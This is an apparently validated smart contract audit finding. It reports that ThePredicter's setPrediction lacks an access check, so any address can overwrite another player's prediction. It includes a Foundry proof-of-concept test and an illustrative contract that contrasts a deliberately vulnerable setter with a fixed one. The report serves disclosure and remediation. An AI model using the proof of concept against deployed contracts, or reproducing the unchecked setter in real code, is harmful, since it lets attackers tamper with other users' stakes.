Submission Details
Severity: high
Valid

A player can change the prediction of other players

Summary

A player can change the prediction of other players.

Vulnerability Details

The ThePredicter::makePrediction function lets players submit a prediction for the outcome of a match and uses msg.sender to identify the player. The ThePredicter::setPrediction function, which lets a player change a prediction, instead takes a player parameter (the address whose prediction is changed) and never compares that address with msg.sender, so the caller can pass any player's address.

Proof of Concept

Add the code below to the test file

```solidity
function test_makePredictionForOthers() public {
    // A second account that never registers as a player.
    address stranger2 = makeAddr("stranger2");

    // stranger registers and pays the entrance fee.
    vm.startPrank(stranger);
    vm.warp(1);
    vm.deal(stranger, 1 ether);
    thePredicter.register{value: 0.04 ether}();
    vm.stopPrank();

    // The organizer approves stranger as a player.
    vm.startPrank(organizer);
    vm.warp(2);
    thePredicter.approvePlayer(stranger);
    vm.stopPrank();

    // Move to the prediction window and let stranger predict match 1,
    // then change its own predictions through setPrediction.
    vm.warp(1723752000);
    vm.startPrank(stranger);
    thePredicter.makePrediction{value: 0.0001 ether}(
        1,
        ScoreBoard.Result.Draw
    );
    scoreBoard.setPrediction(stranger, 1, ScoreBoard.Result.First);
    scoreBoard.setPrediction(stranger, 0, ScoreBoard.Result.First);
    vm.stopPrank();

    // stranger2, who is not a player at all, overwrites stranger's
    // prediction for match 1. The call does not revert.
    vm.startPrank(stranger2);
    scoreBoard.setPrediction(stranger, 1, ScoreBoard.Result.Draw);
    vm.stopPrank();
}
```

Impact

Any player (or any address at all) can change another player's prediction by calling the ThePredicter::setPrediction function with that player's address as the player parameter.

Tools Used

Manual Analysis

Recommendations

Add a check in setPrediction that the player parameter equals msg.sender, so a caller can only change its own prediction.
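To make the finding and the fix concrete, below is an added, self-contained illustration written for this report; it is not the audited ThePredicter or ScoreBoard code. The contract name ScoreBoardExample, the storage layout, the Result enum values, the custom errors, the test account names and the helper getPrediction are all assumptions for this example. It places the unchecked function described above beside the hardened version that compares the player parameter with msg.sender, and a Foundry test shows that the unchecked variant lets a non-player overwrite a prediction while the checked variant reverts.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {Test} from "forge-std/Test.sol";

// Added illustration, not the project's code. Keeps one prediction per
// (player, match) and exposes the vulnerable and the fixed setter side by side.
contract ScoreBoardExample {
    enum Result { Pending, First, Draw, Second }

    uint256 public constant NUM_MATCHES = 9;

    // Assumed layout: predictions[player][matchNumber]
    mapping(address => Result[NUM_MATCHES]) private predictions;

    error NotThePlayer(address caller, address player);
    error BadMatch(uint256 matchNumber);

    // VULNERABLE: `player` comes from the argument list and is never compared
    // with msg.sender, so any caller can overwrite any player's slot.
    function setPredictionUnchecked(address player, uint256 matchNumber, Result result) external {
        if (matchNumber >= NUM_MATCHES) revert BadMatch(matchNumber);
        predictions[player][matchNumber] = result;
    }

    // FIXED: the caller may only write its own slot. The parameter is kept so
    // the external interface is unchanged, but it must equal msg.sender.
    function setPrediction(address player, uint256 matchNumber, Result result) external {
        if (player != msg.sender) revert NotThePlayer(msg.sender, player);
        if (matchNumber >= NUM_MATCHES) revert BadMatch(matchNumber);
        predictions[player][matchNumber] = result;
    }

    function getPrediction(address player, uint256 matchNumber) external view returns (Result) {
        if (matchNumber >= NUM_MATCHES) revert BadMatch(matchNumber);
        return predictions[player][matchNumber];
    }
}

// Foundry test for the two setters above (run with `forge test`).
contract ScoreBoardExampleTest is Test {
    ScoreBoardExample board;
    address alice = makeAddr("alice");     // a player
    address mallory = makeAddr("mallory"); // an unrelated address

    function setUp() public {
        board = new ScoreBoardExample();
    }

    // The unchecked setter lets mallory overwrite alice's prediction.
    function test_unchecked_allows_overwrite() public {
        vm.prank(alice);
        board.setPredictionUnchecked(alice, 1, ScoreBoardExample.Result.Draw);

        vm.prank(mallory);
        board.setPredictionUnchecked(alice, 1, ScoreBoardExample.Result.First);

        assertEq(uint8(board.getPrediction(alice, 1)), uint8(ScoreBoardExample.Result.First));
    }

    // The checked setter reverts with NotThePlayer and leaves alice's slot intact.
    function test_checked_rejects_other_player() public {
        vm.prank(alice);
        board.setPrediction(alice, 1, ScoreBoardExample.Result.Draw);

        vm.prank(mallory);
        vm.expectRevert(
            abi.encodeWithSelector(ScoreBoardExample.NotThePlayer.selector, mallory, alice)
        );
        board.setPrediction(alice, 1, ScoreBoardExample.Result.First);

        assertEq(uint8(board.getPrediction(alice, 1)), uint8(ScoreBoardExample.Result.Draw));
    }
}
```

The check is deliberately the first statement in the fixed setter so that nothing is written before the caller's identity is established; the same pattern applies if predictions are meant to be written only through a specific contract, in which case msg.sender is compared with that contract's address instead.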

Updates

Lead Judging Commences

NightHawK Lead Judge about 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

setPrediction lacks access control

setPrediction has no access control and allows manipulation to Players' predictions.
